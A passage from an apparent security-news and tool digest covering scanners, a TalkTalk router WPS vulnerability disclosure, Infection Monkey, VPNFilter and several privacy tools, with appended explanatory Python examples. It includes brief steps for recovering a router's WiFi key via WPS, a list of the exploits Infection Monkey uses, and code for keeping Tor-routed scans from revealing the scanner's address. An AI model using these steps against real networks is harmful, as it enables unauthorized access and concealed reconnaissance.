        2 Hosts are vulnerable!
        + Output file created: 20170622-093138_232826a7-983f-499b-ad96-7b8f1a75c1d7.txt
        + Full report uploaded to Slack
        + JIRA Issue created: VM-16
        + OpsGenie alert created

      You can also use Salt Grains such as ec2_tags in target_hosts:
        $ sudo ./salt-scanner.py --target-hosts "ec2_tags:Role:webapp" --target-form grain

      Slack Alert

      TODO
        • Clean up the code and add some error handling
        • Use Salt Grains for getting the OS info and installed packages

      [1] Salt in 10 Minutes: https://docs.saltstack.com/en/latest/topics/tutorials/walkthrough.html

      Download: salt-scanner-master.zip or: git clone https://github.com/0x4D31/salt-scanner.git
      Source
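The collection step behind the output above (detect each minion's OS, pull its package list, build one audit request per host), as an added example that is not salt-scanner's own code. Two things in it are assumptions not stated in the post: that Salt's LocalClient.cmd() takes the targeting-type keyword as expr_form on 2016.11 and tgt_type on 2017.7+ (the substitution the README tells you to make by hand), and that the request body shape {"os", "version", "package"} matches the Vulners audit API as publicly documented, which you should verify against current docs before sending anything. The live Salt query is isolated in one function so the rest runs offline on constructed grains and package data.

```python
"""Added example, not salt-scanner's own code: data collection for a
Salt-driven package audit. Assumptions: Salt 2016.11 uses 'expr_form',
2017.7+ uses 'tgt_type' (see the README note); the request shape
{"os", "version", "package"} follows the Vulners audit API as documented."""


def target_kwarg(salt_version):
    """Pick the keyword Salt expects for the targeting type at runtime,
    so a master upgrade does not require editing the scanner."""
    year = int(salt_version.split(".")[0])
    return "tgt_type" if year >= 2017 else "expr_form"


def fetch_minion_data(tgt, tgt_type="glob", salt_version="2016.11.3"):
    """Live query against a salt-master (needs root and the salt package;
    not exercised offline). Returns (grains, pkgs) dicts keyed by minion id."""
    import salt.client  # imported lazily so the rest of the module runs without salt

    client = salt.client.LocalClient()
    kw = {target_kwarg(salt_version): tgt_type}
    grains = client.cmd(tgt, "grains.item",
                        ["os", "osmajorrelease", "osarch"], **kw)
    pkgs = client.cmd(tgt, "pkg.list_pkgs", **kw)
    return grains, pkgs


def rpm_style_names(pkgs, arch):
    """pkg.list_pkgs returns {name: version-release}; the audit request wants
    `rpm -qa` style strings: name-version-release.arch."""
    return sorted("%s-%s.%s" % (name, ver, arch) for name, ver in pkgs.items())


def detected_os(grains):
    """Distinct (os, version) pairs across the fleet, lower-cased the way the
    scanner prints them ('centos', '7'). Fixed versions differ per distro,
    so each pair needs its own audit."""
    return sorted({(g["os"].lower(), str(g["osmajorrelease"]))
                   for g in grains.values()})


def build_audit_requests(grains, pkgs):
    """One request body per minion, matching the per-host output above.
    Minions with no grains or no package list are skipped rather than sent
    as an empty package list, which an audit API would report as clean."""
    requests = {}
    for minion, g in grains.items():
        if not g or not pkgs.get(minion):
            continue
        requests[minion] = {
            "os": g["os"].lower(),
            "version": str(g["osmajorrelease"]),
            "package": rpm_style_names(pkgs[minion], g["osarch"]),
        }
    return requests


# Constructed sample data in the shape Salt returns (not a real fleet).
# 10.10.10.57 answered grains.item but not pkg.list_pkgs, so it is skipped.
SAMPLE_GRAINS = {
    "10.10.10.55": {"os": "CentOS", "osmajorrelease": 7, "osarch": "x86_64"},
    "10.10.10.56": {"os": "CentOS", "osmajorrelease": 7, "osarch": "x86_64"},
    "10.10.10.57": {"os": "CentOS", "osmajorrelease": 7, "osarch": "x86_64"},
}
SAMPLE_PKGS = {
    "10.10.10.55": {"bash": "4.2.46-28.el7", "openssl-libs": "1.0.2k-8.el7"},
    "10.10.10.56": {"bash": "4.2.46-28.el7", "sudo": "1.8.19p2-10.el7"},
}

if __name__ == "__main__":
    print("Detected:", detected_os(SAMPLE_GRAINS))
    for host, req in sorted(build_audit_requests(SAMPLE_GRAINS, SAMPLE_PKGS).items()):
        print(host, req["os"], req["version"], len(req["package"]), "packages")
```

Run the module directly to see the grouping on the sample data; point fetch_minion_data() at a real master (for example with tgt="ec2_tags:Role:webapp", tgt_type="grain", as in the README) to replace the constructed input.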
14. Purpose of this Article

This article demonstrates a vulnerability found in the 'Super Router' router provided by the internet service provider TalkTalk to its customers. The vulnerability discovered allows the attacker to discover the Super Router's WiFi password by attacking the WPS feature in the router, which is always switched on, even if the WPS pairing button is not used. The purpose of this article is to encourage TalkTalk to immediately patch this vulnerability in order to protect their customers.

Tools Used
- Windows-based computer (other tools on Unix platforms may be just as effective, but for the purpose of this article we will focus on one)
- Wireless network adapter
- TalkTalk router within wireless network adapter range
- Software 'Dumpper', available on SourceForge (tested with v.91.2)

Steps to Reproduce
Step 1: Run Dumpper, navigate to the WPS tab and select the target WiFi BSSID.
Step 2: Click 'WpsWin' to begin probing the BSSID for the WPS PIN.
Step 3: After a couple of seconds, the WiFi access key to this network will be displayed bottom right.

Scale of Vulnerability
This method has proven successful on multiple TalkTalk Super Routers belonging to consenting parties, which is enough to suggest that this vulnerability affects all TalkTalk Super Routers of this particular model/version. TalkTalk have been notified of this vulnerability in the past and have failed to patch it many years later. It is also documented across various community forums.

Links:
- 2014 TalkTalk Forum Post: D-Link RT2860 [Security issue]
- 2014 BroadbandBanter Forum Post: TalkTalk DSL-3680 WPS security vulnerability
- 2016 Hashkiller Forum Post: WPA Packet Cracking - TalkTalk

Disclosure
TalkTalk have been notified of this vulnerability on the day of the article being written (21 May 2018). Typically a 30-day period from discovery to public release would be granted. However, in this case, as TalkTalk were made aware of this exploit back in 2014, public release is immediate.

Date        | Disclosure
21 May 2018 | Delivered to TalkTalk.
21 May 2018 | Date of public release.

Reference: https://securityaffairs.co/wordpress/72805/laws-and-regulations/talktalk-super-routers-flaws.html
Source: https://www.indigofuzz.com/article.php?docid=talktalk1430
15. Sandmap

Sandmap is a tool supporting network and system reconnaissance using the massive Nmap engine. It provides a user-friendly interface, automates and speeds up scanning and allows you to easily use many advanced scanning techniques.

Key Features
- simple CLI with the ability to run pure Nmap engine
- predefined scans included in the modules
- support Nmap Scripting Engine (NSE) with scripts arguments
- TOR support (with proxychains)
- multiple scans at one time
- at this point: 31 modules with 459 scan profiles

How To Use
It's simple:

  # Clone this repository
  git clone --recursive https://github.com/trimstray/sandmap

  # Go into the repository
  cd sandmap

  # Install
  ./setup.sh install

  # Run the app
  sandmap

- symlink to bin/sandmap is placed in /usr/local/bin
- man page is placed in /usr/local/man/man8

Command Line
Before using Sandmap, read the Command Line introduction.

Configuration
The etc/main.cfg configuration file has the following structure:

  # shellcheck shell=bash

  # Specifies the default destination.
  # Examples:
  #   - dest="127.0.0.1,8.8.8.8"
  dest="127.0.0.1"

  # Specifies the extended Nmap parameters.
  # Examples:
  #   - params="--script ssl-ccs-injection -p 443"
  params=""

  # Specifies the default output type and path.
  # Examples:
  #   - report="xml"
  report=""

  # Specifies the TOR connection.
  # Examples:
  #   - tor="true"
  tor=""

  # Specifies the terminal type.
  # Examples:
  #   - terminal="internal"
  terminal="internal"

Requirements
Sandmap uses external utilities that must be installed before running:
- nmap
- xterm
- proxychains

This tool works with:
- GNU/Linux or BSD (tested on Debian, CentOS and FreeBSD)
- Bash (tested on 4.4.19)
- Nmap (tested on 7.70)

You will also need root access.

Other

Modules
Available modules: 31
Available scan profiles: 459

Contributing
See this.

Download: sandmap-master.zip or: git clone https://github.com/trimstray/sandmap.git
Source
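The TOR option above deserves a caveat that the README does not spell out: proxychains works by LD_PRELOAD-hooking connect() and name resolution, so only full-connect TCP scans (-sT) actually traverse the proxy. Nmap's default SYN scan as root (-sS), ICMP host discovery, UDP probes, OS detection and traceroute use raw sockets, leave the machine directly and expose the scanner's real address even though tor="true". The following is an added example, not Sandmap's code: it parses a main.cfg of the documented shape (only the dest, params and tor keys are taken from the README; the rest is an assumption) and builds an argv that forces proxy-safe options when TOR is enabled, refusing to run rather than silently leaking.

```python
"""Added example, not sandmap's own code: turn an etc/main.cfg of the shape
documented above into an nmap argv, refusing proxy-unsafe scans when
tor="true". Key names dest/params/tor come from the README; the rest is
illustrative."""
import re
import shlex

_KV = re.compile(r'^\s*([A-Za-z_][A-Za-z0-9_]*)="([^"]*)"\s*$')

# Options that use raw sockets or ICMP and therefore bypass proxychains.
_PROXY_UNSAFE = {"-sS", "-sU", "-sA", "-sW", "-sM", "-sN", "-sF", "-sX",
                 "-O", "--traceroute", "-PE", "-PP", "-PM"}


def parse_cfg(text):
    """Parse key="value" lines; comments and blanks are ignored. The file is
    parsed, never sourced: sourcing would execute anything it contains."""
    cfg = {}
    for line in text.splitlines():
        if not line.strip() or line.lstrip().startswith("#"):
            continue
        m = _KV.match(line)
        if m:
            cfg[m.group(1)] = m.group(2)
    return cfg


def build_nmap_argv(cfg):
    """Return the argv to run (via subprocess, no shell).

    With tor="true": prefix proxychains, force a connect scan (-sT), skip
    host discovery (-Pn) and local DNS (-n), and reject user params that
    would leave the box outside the proxy.
    """
    params = shlex.split(cfg.get("params", ""))
    targets = [t for t in cfg.get("dest", "").split(",") if t]
    if not targets:
        raise ValueError("no destination configured")
    if cfg.get("tor", "").lower() != "true":
        return ["nmap"] + params + targets
    leaking = sorted(_PROXY_UNSAFE.intersection(params))
    if leaking:
        raise ValueError("options bypass proxychains: %s" % " ".join(leaking))
    return ["proxychains", "nmap", "-sT", "-Pn", "-n"] + params + targets


# Constructed sample in the documented format (not a real deployment).
SAMPLE_CFG = '''# shellcheck shell=bash
dest="127.0.0.1,8.8.8.8"
params="--script ssl-ccs-injection -p 443"
report=""
tor="true"
terminal="internal"
'''

if __name__ == "__main__":
    print(" ".join(build_nmap_argv(parse_cfg(SAMPLE_CFG))))
```

Service detection (-sV) and NSE scripts ride on the connect()ed sockets, so they remain usable through the proxy; what you lose is everything that needs a raw socket, which is exactly the set the wrapper rejects.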
  16. The majority of the modern economy's logistics is implemented via shipping vessels controlled through systems that embody a combination of the worst parts of a corporate network, ICS, and embedded systems. These systems were largely designed decades ago and are rarely, if ever, updated - yet are exposed to a large number of attack surfaces on the internet and via radio-frequency attacks. This talk will cover the protocols used by the commonly implemented systems found in both commercial and private maritime vessels - including large capacity tankers and container ships - and the shoreside infrastructure used to communicate with, and issue commands to, the shipboard systems. We will see how this infrastructure can be attacked, and how it in turn can be used to carry out significant attacks that could cause major disruption to the world's economy. Recorded at NolaCon 2018
17. DARKSURGEON is a Windows Packer project to empower incident response, digital forensics, malware analysis, and network defense.
https://darksurgeon.io

Darksurgeon has three stated goals:
1. Accelerate incident response, digital forensics, malware analysis, and network defense with a preconfigured Windows 10 environment complete with tools, scripts, and utilities.
2. Provide a framework for defenders to customize and deploy their own programmatically-built Windows images using Packer and Vagrant.
3. Reduce the amount of latent telemetry collection, minimize error reporting, and provide reasonable privacy and hardening standards for Windows 10.

If you haven't worked with Packer before, this project has a simple premise: provide all the tools you need to have a productive, secure, and private Windows virtual machine so you can spend less time tweaking your environment and more time fighting bad guys.

Please note this is an alpha project and it will be subject to continual development, updates, and package breakage.

Development Principles
Darksurgeon is based on a few key development principles:
- Modularity is key. Each component of the installation and configuration process should be modular. This allows individuals to tailor their Packer image in the most flexible way.
- Builds must be atomic. A Packer build should either complete all configuration and installation tasks without errors, or it should fail. A Packer image with missing tools is a failure scenario.
- Hardened out of the box. To the extent that it will not interfere with investigative workflows, all settings related to proactive hardening and security controls should be enabled. Further information on Darksurgeon security can be found later in this post.
- Instrumented out of the box. To the extent that it will not interfere with investigative workflows, Microsoft Sysmon, Windows Event Logging, and osquery will provide detailed telemetry on host behavior without further configuration.
- Private out of the box. To the extent that it will not interfere with investigative workflows, all settings related to privacy, Windows telemetry, and error reporting should minimize collection.

Building Darksurgeon

Build Process
Darksurgeon is built using the HashiCorp application Packer. The total build time for a new instance of Darksurgeon is around 2–3 hours.
1. Packer creates a new virtual machine using the Darksurgeon JSON file and your hypervisor of choice (e.g. Hyper-V, VirtualBox, VMware).
2. The answers.iso file is mounted inside the Darksurgeon VM along with the Windows ISO. The answers.iso file contains the unattend.xml needed for a touchless installation of Windows, as well as a PowerShell script to configure Windows Remote Management (WinRM).
3. Packer connects to the Darksurgeon VM using WinRM and copies over all files in the helper-scripts and configuration-files directory to the host.
4. Packer performs serial installations of each of the configured PowerShell scripts, performing occasional reboots as needed.
5. When complete, Packer performs a sysprep, shuts down the virtual machine, and creates a Vagrant box file. Additional outputs may be specified in the post-processors section of the JSON file.

Setup
Note: Hyper-V is currently the only supported hypervisor in this alpha release. VirtualBox and VMware support are forthcoming.
1. Install Packer, Vagrant, and your preferred hypervisor on your host.
2. Download the repository contents to your host.
3. Download a Windows 10 Enterprise Evaluation ISO (1803).
4. Move the ISO file to your local Darksurgeon repository.
5. Update Darksurgeon.json with the ISO SHA1 hash and file name.
6. (Optional) Execute the PowerShell script New-Darksurgeon.ps1 to generate a new answers.iso file. There is an answers ISO file included in the repository, but you may re-build this if you don't trust it, or if you would like to modify the unattend files:
     powershell.exe New-DARKSURGEONISO.ps1
7. Build the recipe using Packer:
     packer build -only=[hyperv-iso|vmware|virtualbox] .\DARKSURGEON.json

Using Darksurgeon
Note: Hyper-V is currently the only supported hypervisor in this alpha release. VirtualBox and VMware support are forthcoming.

Once Darksurgeon has successfully built, you'll receive an output Vagrant box file. The box file contains the virtual machine image and Vagrant metadata, allowing you to quickly spin up a virtual machine as needed.
1. Install Vagrant and your preferred hypervisor on your host.
2. Navigate to the Darksurgeon repository (or the location where you've saved the Darksurgeon box file).
3. Perform a vagrant up:
     vagrant up

Vagrant will now extract the virtual machine image from the box file, read the metadata, and create a new VM for you. Want to kill this VM and get a new one? Easy, just perform the following:

  vagrant destroy && vagrant up

Once the Darksurgeon virtual machine is running, you can log in using one of the two local accounts:
Note: These are default accounts with default credentials. You may want to consider changing the credentials in your Packer build.
- Administrator Account: Username: Darksurgeon, Password: darksurgeon
- Local User Account: Username: Unprivileged, Password: unprivileged

If you'd rather not use Vagrant, you can either import the VM image manually, or look at one of the many other post-processor options provided by Packer.

Download: DARKSURGEON-master.zip
Sources: https://github.com/cryps1s/DARKSURGEON https://darksurgeon.io
18. The new EU Regulation on the processing of personal data and the free movement of such data entered into force on Friday in all European Union member states, including Romania. The new regulation obliges companies operating in the European Union to ask for and obtain users' consent before collecting and processing their data. In the event of a data leak, companies are obliged to notify the affected users/customers and the authorities within at most 72 hours. Non-compliance can lead to a company being fined up to 20 million euros or 4% of its turnover. In Romania, however, the necessary legislation was adopted by Parliament only this week and is awaiting promulgation. The bill also spent two days at the general secretariats of the two parliamentary chambers, in view of a possible exercise of the right to refer it to the Constitutional Court. Consequently, most likely on the very day the GDPR enters into force, the law can be sent to the president for promulgation. If promulgated by Klaus Iohannis, the law will enter into force 3 days after its publication in the Monitorul Oficial (Official Gazette). Via b1.ro
19. PornHub wants you to keep your porn viewing activities private, and it is ready to help you out with its all-new VPN service. Yes, you heard that right. Adult entertainment giant PornHub has launched its very own VPN service today with "free and unlimited bandwidth" to help you keep prying eyes away from your browsing activity. Dubbed VPNhub, the VPN service by PornHub is available for both mobile and desktop platforms, including Android, iOS, macOS, and Windows. A VPN, or Virtual Private Network, allows users to transmit data anonymously, avoids ISP-level website blocking or tracking and keeps your browsing activity private by encrypting your data, even when you are on public Wi-Fi connections. VPNhub promises never to store, collect, sell, or share your personal information with any third parties for their marketing, advertising or research purposes. However, in its privacy policy under the heading "How We Use Your Information," the company says it can sell "aggregate or non-personally identifiable information with non-affiliated third parties for advertising, marketing or research purposes." Since some governments, including that of the United Kingdom, are regulating adult content online, launching a VPN service by Pornhub makes sense. VPNhub is available in countries across the globe except for Burma/Myanmar, Cuba, Iran, North Korea, Sudan, and Syria, due to the ban imposed by the U.S. government. While mobile users (both iOS and Android) can download and use the VPNhub app for free, desktop users (macOS and Windows) have to purchase a premium account. You can also upgrade your free account to a premium subscription for $13 a month or $90 for a full year, which eliminates ads, provides faster connection speeds, and opens up "servers from a wide range of countries." You can give premium VPNhub a try by using its 7-day free trial. Via thehackernews.com
20. Infection Monkey - Data Center Security Testing Tool

Welcome to the Infection Monkey! The Infection Monkey is an open source security tool for testing a data center's resiliency to perimeter breaches and internal server infection. The Monkey uses various methods to self propagate across a data center and reports success to a centralized Monkey Island server.

The Infection Monkey is comprised of two parts:
- Monkey - A tool which infects other machines and propagates to them
- Monkey Island - A dedicated server to control and visualize the Infection Monkey's progress inside the data center

To read more about the Monkey, visit http://infectionmonkey.com

Main Features
The Infection Monkey uses the following techniques and exploits to propagate to other machines.

Multiple propagation techniques:
- Predefined passwords
- Common logical exploits
- Password stealing using Mimikatz

Multiple exploit methods:
- SSH
- SMB
- RDP
- WMI
- Shellshock
- Conficker
- SambaCry
- Elastic Search (CVE-2015-1427)

Setup
Check out the Setup page in the Wiki or a quick getting started guide.

Building the Monkey from source
If you want to build the monkey from source, see Setup and follow the instructions in the readme files under infection_monkey and monkey_island.

Download: monkey-develop.zip or: git clone https://github.com/guardicore/monkey.git
Source
21. Anon — A UNIX Command To Anonymise Data

Anon is a tool for taking delimited files and anonymising or transforming columns until the output is useful for applications where sensitive information cannot be exposed.

Installation
Releases of Anon are available as pre-compiled static binaries on the corresponding GitHub release. Simply download the appropriate build for your machine and make sure it's in your PATH (or use it directly).

Usage

  anon [--config <path to config file, default is ./config.json>] [--output <path to output to, default is STDOUT>]

Anon is designed to take input from STDIN and by default will output the anonymised file to STDOUT:

  anon < some_file.csv > some_file_anonymised.csv

Configuration
In order to be useful, Anon needs to be told what you want to do to each column of the CSV. The config is defined as a JSON file (defaults to a file called config.json in the current directory):

  {
    "csv": {
      "delimiter": ","
    },
    // Optionally define a number of rows to randomly sample down to.
    // To do it, it will hash (using FNV-1 32 bits) the column with the ID
    // in it and will mod the result by the value specified to decide if the
    // row is included or not -> include = hash(idColumn) % mod == 0
    "sampling": {
      // Number used to mod the hash of the id and determine if the row
      // has to be included in the sample or not
      "mod": 30000,
      // Specify in which column a unique ID exists on which the sampling can
      // be performed. Indices are 0 based, so this would sample on the first
      // column.
      "idColumn": 0
    },
    // An array of actions to take on each column - indices are 0 based, so index
    // 0 in this array corresponds to column 1, and so on.
    //
    // There must be an action for every column in the CSV.
    "actions": [
      {
        // The no-op, leaves the input unchanged.
        "name": "nothing"
      },
      {
        // Takes a UK format postcode (eg. W1W 8BE) and just keeps the outcode
        // (eg. W1W).
        "name": "outcode"
      },
      {
        // Hash (SHA1) the input.
        "name": "hash",
        // Optional salt that will be appended to the input.
        // If not defined, a random salt will be generated
        "salt": "salt"
      },
      {
        // Given a date, just keep the year.
        "name": "year",
        "dateConfig": {
          // Define the format of the input date here.
          "format": "YYYYmmmdd"
        }
      },
      {
        // Summarise a range of values.
        "name": "range",
        "rangeConfig": {
          "ranges": [
            // For example, this will take values between 0 and 100, and convert
            // them to the string "0-100".
            // You can use one of (gt, gte) and (lt, lte) but not both at the
            // same time.
            // You also need to define at least one of (gt, gte, lt, lte).
            { "gte": 0, "lt": 100, "output": "0-100" }
          ]
        }
      }
    ]
  }

How to contribute
Any contribution is welcome: raise a bug (and fix it! :-)), request or add a new feature... Don't be shy and raise a pull request; anything on the following topics will be very welcome:
- New actions to anonymise data
- New input formats (JSON?)
- Bug fixes

You can also take a look at the issues and pick the one you like better. If you are going to contribute, we ask you to do the following:
- Use gofmt to format your code
- Check your code with go vet, gocyclo, golint
- Cover the logic with enough tests

Download: anon-master.zip or: git clone https://github.com/intenthq/anon.git
Source
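The sampling rule and the column actions in the config above, re-implemented in Python as an added example (Anon itself is written in Go; this is not the project's code). It follows the README where the README is specific: the ID column is hashed with 32-bit FNV-1 (multiply, then XOR, per byte; FNV-1a reverses the order and gives different values), a row is kept when hash % mod == 0, the hash action is SHA-1 over the input with the salt appended and a random per-run salt when none is configured. One assumption: the year action here takes a Python strptime format such as "%Y%m%d" rather than the "YYYYmmmdd" tokens Anon uses in its own config. The config and CSV at the bottom are constructed for the demonstration.

```python
"""Added example (Python, not anon's own Go code): the sampling rule and
column actions described in the config above, run over a constructed CSV.
Assumption: 'year' takes a strptime format ("%Y%m%d"), not anon's tokens."""
import csv
import hashlib
import io
import os
from datetime import datetime

FNV_OFFSET_32, FNV_PRIME_32 = 0x811C9DC5, 0x01000193


def fnv1_32(data):
    """FNV-1: h = (h * prime) mod 2^32, then h ^= byte. FNV-1a swaps the order."""
    h = FNV_OFFSET_32
    for b in bytearray(data):
        h = ((h * FNV_PRIME_32) & 0xFFFFFFFF) ^ b
    return h


def keep_row(row, sampling):
    """include = hash(idColumn) % mod == 0, so a given ID is kept or dropped
    consistently across every file sampled with the same config."""
    if not sampling:
        return True
    return fnv1_32(row[sampling["idColumn"]].encode("utf-8")) % sampling["mod"] == 0


def act_hash(value, salt):
    """SHA-1(value || salt). An unguessable salt is what stops dictionary
    reversal of low-entropy fields such as e-mail addresses."""
    return hashlib.sha1((value + salt).encode("utf-8")).hexdigest()


def act_outcode(postcode):
    """'W1W 8BE' -> 'W1W'; with the space missing, the inward code is the last 3."""
    p = postcode.strip().upper()
    return p.split()[0] if " " in p else p[:-3]


def act_year(value, fmt):
    return str(datetime.strptime(value, fmt).year)


def act_range(value, ranges):
    """First bucket whose configured (gt|gte) and (lt|lte) bounds admit the value."""
    v = float(value)
    checks = {"gt": lambda a, b: a > b, "gte": lambda a, b: a >= b,
              "lt": lambda a, b: a < b, "lte": lambda a, b: a <= b}
    for r in ranges:
        if all(checks[k](v, r[k]) for k in checks if k in r):
            return r["output"]
    raise ValueError("no range matches %r" % value)


def apply_action(value, action, run_salt):
    name = action["name"]
    if name == "nothing":
        return value
    if name == "hash":
        return act_hash(value, action.get("salt", run_salt))
    if name == "outcode":
        return act_outcode(value)
    if name == "year":
        return act_year(value, action["dateConfig"]["format"])
    if name == "range":
        return act_range(value, action["rangeConfig"]["ranges"])
    raise ValueError("unknown action %r" % name)


def anonymise(text, config):
    """Apply the config to CSV text and return the anonymised CSV text.
    One random salt per run backs every 'hash' action that has no salt."""
    actions, delim = config["actions"], config["csv"]["delimiter"]
    run_salt = os.urandom(16).hex()
    out = io.StringIO()
    writer = csv.writer(out, delimiter=delim, lineterminator="\n")
    for row in csv.reader(io.StringIO(text), delimiter=delim):
        if len(row) != len(actions):
            raise ValueError("config must have exactly one action per column")
        if keep_row(row, config.get("sampling")):
            writer.writerow([apply_action(v, a, run_salt) for v, a in zip(row, actions)])
    return out.getvalue()


# Constructed config and input for the demonstration (not from the project).
RANGES = [{"gte": 0, "lt": 100, "output": "0-100"},
          {"gte": 100, "lte": 1000, "output": "100-1000"}]
CONFIG = {"csv": {"delimiter": ","}, "sampling": {"mod": 2, "idColumn": 0},
          "actions": [{"name": "nothing"}, {"name": "outcode"},
                      {"name": "hash", "salt": "salt"},
                      {"name": "year", "dateConfig": {"format": "%Y%m%d"}},
                      {"name": "range", "rangeConfig": {"ranges": RANGES}}]}
SAMPLE_CSV = ("a,W1W 8BE,alice@example.com,19840117,42\n"
              "b,SW1A 1AA,bob@example.com,20010930,250\n")
```

With mod set to 2, FNV-1 of "a" (0x050c5d7e) is even and the row is kept, while "b" (0x050c5d7d) is odd and dropped; a real config uses a large mod like the README's 30000 to sample roughly one ID in thirty thousand. Note that a fixed salt in the config, as in the example, makes hashed columns joinable across runs, which is sometimes the point and sometimes the leak.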
22. fi6s: Fast IPv6 scanner

fi6s is an IPv6 port scanner designed to be fast. This is achieved by sending and processing raw packets asynchronously. The design and goal are pretty similar to Masscan, though it is not as full-featured yet.

Building
Building should be fairly easy on up-to-date distros. On Ubuntu 16.04 (xenial) it looks like this:

  # apt install gcc make git libpcap-dev
  $ git clone https://github.com/sfan5/fi6s.git
  $ cd fi6s
  $ make BUILD_TYPE=release

The scanner executable will be ready at ./fi6s. Note that fi6s is developed solely on Linux, thus it probably won't compile on non-Linux OSs (notably Windows).

Usage
Usage is pretty easy; fi6s will try to auto-detect the dirty technical details (source/dest MAC, source IP).

  # ./fi6s -p 80,8000-8100 2001:db8::/120

This example will:
- scan the 2001:db8::/120 subnet (256 addresses in total)
- scan port 80 and ports 8000 to 8100 (102 ports in total)
- output scan results to stdout in the "list" format

There are several other ways of specifying an address range to scan; if you aren't sure what's about to happen, invoke fi6s with --echo-hosts and it will print every host that would've been scanned. For advanced features please consult the output of ./fi6s -h.

Grabbing banners
Since fi6s has its own TCP stack, the OS stack needs to be disabled to avoid interference with banner grabbing (RST packets). This is most easily done using ip6tables and a constant --source-port. Banner grabbing is then enabled by passing --banners:

  # ip6tables -A INPUT -p tcp -m tcp --dport 12345 -j DROP
  # ./fi6s -p 22 --banners --source-port 12345 2001:db8::/120

Download: fi6s-master.zip or: git clone https://github.com/sfan5/fi6s.git
Source
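Why the ip6tables rule above matters, and a check for it, as an added example that is not fi6s code: fi6s drives its own TCP state machine over a raw socket, but every SYN-ACK a target returns also reaches the kernel, which has no socket bound to that source port and answers with a RST, tearing the connection down before any banner arrives. The DROP rule hides those replies from the kernel (libpcap still sees them, because capture happens before netfilter), so without it the scan appears to work but returns no banners. The function below parses the text of `ip6tables -S INPUT` (a constructed sample here, so it runs offline without root) to see whether the chosen --source-port is already covered, and emits the rule only when it is missing.

```python
"""Added example, not fi6s code: verify that the ip6tables DROP rule for the
chosen --source-port exists before launching a --banners scan, and build the
commands to run. Input is `ip6tables -S INPUT` text, parsed not executed."""
import re
import shlex

# `ip6tables -S` prints appended rules in canonical form, e.g.
# "-A INPUT -p tcp -m tcp --dport 12345 -j DROP".
_RULE = re.compile(r"^-A INPUT .*-p tcp .*--dport (\d+) .*-j DROP$")


def dropped_ports(rules_text):
    """Ports covered by an INPUT tcp --dport DROP rule."""
    ports = set()
    for line in rules_text.splitlines():
        m = _RULE.match(line.strip())
        if m:
            ports.add(int(m.group(1)))
    return ports


def banner_scan_commands(rules_text, ports, prefix, source_port):
    """Commands to run in order: the ip6tables insert only if the port is
    not yet dropped, then the fi6s invocation pinned to that source port."""
    if not 1024 <= source_port <= 65535:
        raise ValueError("pick an unprivileged, otherwise unused source port")
    cmds = []
    if source_port not in dropped_ports(rules_text):
        cmds.append("ip6tables -A INPUT -p tcp -m tcp --dport %d -j DROP" % source_port)
    cmds.append("./fi6s -p %s --banners --source-port %d %s"
                % (ports, source_port, shlex.quote(prefix)))
    return cmds


# Constructed `ip6tables -S INPUT` output (not captured from a real host).
SAMPLE_RULES = """-P INPUT ACCEPT
-A INPUT -m conntrack --ctstate RELATED,ESTABLISHED -j ACCEPT
-A INPUT -p tcp -m tcp --dport 12345 -j DROP
"""

if __name__ == "__main__":
    for c in banner_scan_commands(SAMPLE_RULES, "22", "2001:db8::/120", 4444):
        print(c)
```

Remember to delete the rule (`ip6tables -D INPUT ...` with the same match) when the scan is over; leaving it in place silently blackholes any later service that happens to bind that port.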
23. Tracy

A pentesting tool designed to assist with finding all sinks and sources of a web application and display these results in a digestible manner. tracy should be used during the mapping-the-application phase of the pentest to identify sources of input and their corresponding outputs. tracy can use this data to intelligently find vulnerable instances of XSS, especially with web applications that use lots of JavaScript.

tracy is a browser extension and light-weight HTTP proxy that records all user input to a web application and monitors any time those inputs are output, for example in a DOM write, server response, or call to eval.

For guides and reference materials about tracy, see the documentation.

Installation
It is strongly recommended that you use a released version. Release binaries are available on the releases page. Download the appropriate release binary and run it:

  # Run the proxy server and the tracer API. Pick the binary that works for your host.
  $ ./tracy-linux-amd64

Then, install the browser extension with Firefox or Chrome using one of the following links: firefox, chrome.

Once tracy is running and the plugin is installed, install the certificate into your browser's certificate store (the certificate is located in the .tracy folder in the home directory) and configure your browser to use the proxy (the default proxy address is localhost on port 7777).

Note: The tracy binary and browser extension work together. Running one without the other will result in unexpected behavior.

Download: tracy-master.zip or git clone https://github.com/nccgroup/tracy.git
Source
24. Shortly after Cisco released its early report on a large-scale hacking campaign that infected over half a million routers and network storage devices worldwide, the United States government announced the takedown of a key internet domain used for the attack.

Yesterday we reported about a piece of highly sophisticated IoT botnet malware that infected over 500,000 devices in 54 countries and has likely been designed by a Russia-backed state-sponsored group in a possible effort to cause havoc in Ukraine, according to an early report published by Cisco's Talos cyber intelligence unit on Wednesday.

Dubbed VPNFilter by the Talos researchers, the malware is a multi-stage, modular platform that targets small and home office (SOHO) routers and storage devices from Linksys, MikroTik, NETGEAR, and TP-Link, as well as network-attached storage (NAS) devices.

Meanwhile, the court documents unsealed in Pittsburgh on the same day indicate that the FBI has seized a key web domain communicating with a massive global botnet of hundreds of thousands of infected SOHO routers and other NAS devices.

The court documents said the hacking group behind the massive malware campaign is Fancy Bear, a Russian government-aligned hacking group also known as APT28, Sofacy, X-agent, Sednit, Sandworm, and Pawn Storm. The hacking group has been in operation since at least 2007 and has been credited with a long list of attacks over the past years, including the 2016 hack of the Democratic National Committee (DNC) and Clinton Campaign to influence the U.S. presidential election.

Among other things, Talos researchers also found evidence that the VPNFilter source code shares code with versions of BlackEnergy, the malware responsible for multiple large-scale attacks targeting devices in Ukraine that the U.S. government has attributed to Russia.

VPNFilter has been designed in a way that it could be used to secretly conduct surveillance on its targets and gather intelligence, interfere with internet communications, monitor industrial control or SCADA systems, such as those used in electric grids, other infrastructure and factories, as well as conduct destructive cyber attack operations.

The seizure of the domain that is part of VPNFilter's command-and-control infrastructure allows the FBI to redirect attempts by stage one of the malware (in an attempt to reinfect the device) to an FBI-controlled server, which will capture the IP addresses of infected devices and pass them on to authorities around the globe who can remove the malware.

Users of SOHO and NAS devices that are infected with VPNFilter are advised to reboot their devices as soon as possible, which eliminates the non-persistent second-stage malware, causing the persistent first-stage malware on their infected device to call out for instructions.

Since VPNFilter does not exploit any zero-day vulnerability to infect its victims and instead searches for devices still exposed to known vulnerabilities or having default credentials, users are strongly recommended to change the default credentials on their devices to protect against the malware. Moreover, always put your routers behind a firewall, and turn off remote administration until and unless you really need it. If your router is vulnerable by default and can't be updated, it is time you bought a new one. You need to be more vigilant about the security of your smart IoT devices. Via thehackernews.com
